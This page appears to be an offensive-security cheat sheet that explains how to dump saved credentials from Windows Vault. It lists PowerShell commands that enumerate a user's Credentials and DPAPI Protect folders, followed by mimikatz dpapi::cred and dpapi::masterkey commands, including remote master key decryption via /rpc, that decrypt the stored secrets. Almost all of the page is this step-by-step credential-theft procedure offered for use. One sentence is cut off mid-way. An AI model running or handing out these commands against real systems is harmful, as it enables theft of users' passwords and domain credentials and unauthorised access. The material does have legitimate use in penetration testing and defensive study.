icon

Dumping Credentials from Windows Vault

Last modified: 2023-03-26

We may be able to retrieve credentials if Windows Vault credentials are stored some folders.

1. Enumerate Credentials

# Under %APPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\

# Under %LOCALAPPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Credentials\

2. Dump Credential Information

mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\123ABC...
# or
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC...

We can retrieve the guidMasterKey value that is used for the next section.

3. Decrypt MasterKey

The DPAPI keys are stored under %APPDATA%\Microsofr\Protect\ or %LOCALAPPDATA%\Microsoft\Protect\ folder. These keys are used for encrypting

# Under %APPDATA%
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\

# Under %LOCALAPPDATA%
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\
dir C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
dir  C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\

Now decrypt the master keys:

# /rpc: Remotely decrypt the MasterKey
mimikatz # dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\{STRING} /rpc

We can get the key value that is the decrypted Master Key.

4. Dump Credentials

We can dump credentials using the collected Credential value and decrypted Master Key (domainkey).

# Specify '/<guidMasterKey>::<masterkey>'
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC... /01234567-890abcde...::abcdef...